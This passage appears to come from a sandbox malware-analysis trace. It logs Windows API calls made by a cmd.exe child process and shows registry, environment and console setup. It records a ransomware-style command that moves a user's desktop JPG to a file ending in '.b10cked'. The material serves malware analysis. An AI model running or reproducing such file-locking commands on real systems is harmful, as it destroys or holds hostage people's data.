moved.\r\n") returned 0x13 [0142.608] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x30ef50 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0142.608] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x30ef34, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x30ef34*=0x1a) returned 1 [0142.608] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.608] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.608] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.608] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.608] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.608] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.608] SetConsoleInputExeNameW () returned 
0x1 [0142.608] GetConsoleOutputCP () returned 0x1b5 [0142.608] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.608] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.609] exit (_Code=0) Process: id = "176" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16dc0" os_pid = "0xea0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_IRBU~1.JPG\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 15038 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 15039 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 15040 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 15041 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 15042 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id 
= 15043 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 15044 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 15045 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 15046 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 15047 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15690 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15691 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15692 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15693 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 15694 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 15695 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15696 start_va 
= 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15697 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15698 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15699 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15700 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15701 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15702 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15703 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15704 start_va = 0x340000 end_va = 0x407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 15705 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = 
"imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15706 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15707 start_va = 0xd0000 end_va = 0xd6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 15708 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 15709 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 15710 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 15711 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 15712 start_va = 0x520000 end_va = 0x111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 15713 start_va = 0x1120000 end_va = 0x1282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Thread: id = 233 os_tid = 0xe9c [0140.455] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efc9c | out: lpSystemTimeAsFileTime=0x1efc9c*(dwLowDateTime=0x8da5b160, dwHighDateTime=0x1d440a9)) [0140.455] GetCurrentProcessId () returned 0xea0 [0140.456] GetCurrentThreadId () returned 0xe9c [0140.456] GetTickCount () returned 0x2c189 [0140.456] QueryPerformanceCounter (in: lpPerformanceCount=0x1efc94 | out: lpPerformanceCount=0x1efc94*=19724479968) returned 1 [0140.456] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.456] __set_app_type (_Type=0x1) [0140.456] __p__fmode () 
returned 0x76b331f4 [0140.457] __p__commode () returned 0x76b331fc [0140.457] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.457] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.457] GetCurrentThreadId () returned 0xe9c [0140.457] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe9c) returned 0x38 [0140.457] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.457] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.457] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.457] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.457] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efc2c | out: phkResult=0x1efc2c*=0x0) returned 0x2 [0140.457] VirtualQuery (in: lpAddress=0x1efc63, lpBuffer=0x1efbfc, dwLength=0x1c | out: lpBuffer=0x1efbfc*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.458] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efbfc, dwLength=0x1c | out: lpBuffer=0x1efbfc*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.458] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efbfc, dwLength=0x1c | out: lpBuffer=0x1efbfc*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.458] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efbfc, dwLength=0x1c | out: lpBuffer=0x1efbfc*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, 
RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.458] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efbfc, dwLength=0x1c | out: lpBuffer=0x1efbfc*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.458] GetConsoleOutputCP () returned 0x1b5 [0140.458] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.458] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.458] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.458] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.458] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.458] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.458] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.458] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.459] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.459] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.459] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.459] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.459] GetEnvironmentStringsW () returned 0x250210* [0140.459] FreeEnvironmentStringsW (penv=0x250210) returned 1 [0140.459] GetEnvironmentStringsW () returned 0x250210* [0140.460] FreeEnvironmentStringsW (penv=0x250210) returned 1 [0140.460] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eeb9c | out: phkResult=0x1eeb9c*=0x40) returned 0x0 [0140.460] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eeba4, lpData=0x1eeba8, lpcbData=0x1eeba0*=0x1000 | out: lpType=0x1eeba4*=0x0, lpData=0x1eeba8*=0xa0, lpcbData=0x1eeba0*=0x1000) returned 0x2 [0140.460] RegQueryValueExW (in: hKey=0x40, 
lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eeba4, lpData=0x1eeba8, lpcbData=0x1eeba0*=0x1000 | out: lpType=0x1eeba4*=0x4, lpData=0x1eeba8*=0x1, lpcbData=0x1eeba0*=0x4) returned 0x0 [0140.460] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eeba4, lpData=0x1eeba8, lpcbData=0x1eeba0*=0x1000 | out: lpType=0x1eeba4*=0x0, lpData=0x1eeba8*=0x1, lpcbData=0x1eeba0*=0x1000) returned 0x2 [0140.460] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eeba4, lpData=0x1eeba8, lpcbData=0x1eeba0*=0x1000 | out: lpType=0x1eeba4*=0x4, lpData=0x1eeba8*=0x0, lpcbData=0x1eeba0*=0x4) returned 0x0 [0140.460] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eeba4, lpData=0x1eeba8, lpcbData=0x1eeba0*=0x1000 | out: lpType=0x1eeba4*=0x4, lpData=0x1eeba8*=0x40, lpcbData=0x1eeba0*=0x4) returned 0x0 [0140.460] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eeba4, lpData=0x1eeba8, lpcbData=0x1eeba0*=0x1000 | out: lpType=0x1eeba4*=0x4, lpData=0x1eeba8*=0x40, lpcbData=0x1eeba0*=0x4) returned 0x0 [0140.460] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eeba4, lpData=0x1eeba8, lpcbData=0x1eeba0*=0x1000 | out: lpType=0x1eeba4*=0x0, lpData=0x1eeba8*=0x40, lpcbData=0x1eeba0*=0x1000) returned 0x2 [0140.460] RegCloseKey (hKey=0x40) returned 0x0 [0140.460] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eeb9c | out: phkResult=0x1eeb9c*=0x40) returned 0x0 [0140.460] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eeba4, lpData=0x1eeba8, lpcbData=0x1eeba0*=0x1000 | out: lpType=0x1eeba4*=0x0, lpData=0x1eeba8*=0x40, lpcbData=0x1eeba0*=0x1000) returned 0x2 [0140.460] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eeba4, 
lpData=0x1eeba8, lpcbData=0x1eeba0*=0x1000 | out: lpType=0x1eeba4*=0x4, lpData=0x1eeba8*=0x1, lpcbData=0x1eeba0*=0x4) returned 0x0 [0140.460] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eeba4, lpData=0x1eeba8, lpcbData=0x1eeba0*=0x1000 | out: lpType=0x1eeba4*=0x0, lpData=0x1eeba8*=0x1, lpcbData=0x1eeba0*=0x1000) returned 0x2 [0140.460] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eeba4, lpData=0x1eeba8, lpcbData=0x1eeba0*=0x1000 | out: lpType=0x1eeba4*=0x4, lpData=0x1eeba8*=0x0, lpcbData=0x1eeba0*=0x4) returned 0x0 [0140.460] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eeba4, lpData=0x1eeba8, lpcbData=0x1eeba0*=0x1000 | out: lpType=0x1eeba4*=0x4, lpData=0x1eeba8*=0x9, lpcbData=0x1eeba0*=0x4) returned 0x0 [0140.460] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eeba4, lpData=0x1eeba8, lpcbData=0x1eeba0*=0x1000 | out: lpType=0x1eeba4*=0x4, lpData=0x1eeba8*=0x9, lpcbData=0x1eeba0*=0x4) returned 0x0 [0140.460] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eeba4, lpData=0x1eeba8, lpcbData=0x1eeba0*=0x1000 | out: lpType=0x1eeba4*=0x0, lpData=0x1eeba8*=0x9, lpcbData=0x1eeba0*=0x1000) returned 0x2 [0140.460] RegCloseKey (hKey=0x40) returned 0x0 [0140.461] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636f [0140.461] srand (_Seed=0x5b88636f) [0140.461] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_IRBU~1.JPG\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg.b10cked\"" [0140.461] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_IRBU~1.JPG\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg.b10cked\"" [0140.461] GetCurrentDirectoryW 
(in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.461] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x251970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.461] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.461] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.461] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.461] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.461] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.461] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.461] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.462] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.462] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.462] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.462] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.462] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.462] GetEnvironmentStringsW () returned 0x252360* [0140.462] FreeEnvironmentStringsW (penv=0x252360) returned 1 [0140.462] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.462] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.462] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.462] _wcsicmp 
(_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.462] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.462] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.462] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.462] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.462] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.462] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.462] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef968 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.462] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef968, lpFilePart=0x1ef964 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ef964*="Desktop") returned 0x18 [0140.462] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.463] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef6e4 | out: lpFindFileData=0x1ef6e4) returned 0x2509f0 [0140.463] FindClose (in: hFindFile=0x2509f0 | out: hFindFile=0x2509f0) returned 1 [0140.463] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef6e4 | out: lpFindFileData=0x1ef6e4) returned 0x2509f0 [0140.463] FindClose (in: hFindFile=0x2509f0 | out: hFindFile=0x2509f0) returned 1 [0140.463] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef6e4 | out: lpFindFileData=0x1ef6e4) returned 0x2509f0 [0140.463] FindClose (in: hFindFile=0x2509f0 | out: hFindFile=0x2509f0) returned 1 [0140.463] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.463] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.463] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") 
returned 1 [0140.463] GetEnvironmentStringsW () returned 0x250210* [0140.464] FreeEnvironmentStringsW (penv=0x250210) returned 1 [0140.464] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.464] GetConsoleOutputCP () returned 0x1b5 [0140.464] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.464] GetUserDefaultLCID () returned 0x409 [0140.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efaa8, cchData=128 | out: lpLCData="0") returned 2 [0140.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efaa8, cchData=128 | out: lpLCData="0") returned 2 [0140.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efaa8, cchData=128 | out: lpLCData="1") returned 2 [0140.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.465] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.465] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, 
lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.465] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.465] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.467] GetConsoleTitleW (in: lpConsoleTitle=0x240930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.467] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.467] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.467] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.467] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.468] _wcsicmp (_String1="move", _String2=")") returned 68 [0140.468] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0140.468] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0140.468] _wcsicmp (_String1="IF", _String2="move") returned -4 [0140.468] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0140.468] _wcsicmp (_String1="REM", _String2="move") returned 5 [0140.468] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0140.950] GetConsoleTitleW (in: lpConsoleTitle=0x1ef7a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.950] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0140.950] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0140.950] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0140.950] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0140.950] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0140.950] _wcsicmp (_String1="move", _String2="CD") returned 10 [0140.950] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0140.950] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0140.950] _wcsicmp (_String1="move", _String2="REN") returned -5 [0140.950] 
_wcsicmp (_String1="move", _String2="ECHO") returned 8 [0140.951] _wcsicmp (_String1="move", _String2="SET") returned -6 [0140.951] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0140.951] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0140.951] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0140.951] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0140.951] _wcsicmp (_String1="move", _String2="MD") returned 11 [0140.951] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0140.951] _wcsicmp (_String1="move", _String2="RD") returned -5 [0140.951] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0140.951] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0140.951] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0140.951] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0140.951] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0140.951] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0140.951] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0140.951] _wcsicmp (_String1="move", _String2="VER") returned -9 [0140.951] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0140.951] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0140.951] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0140.951] _wcsicmp (_String1="move", 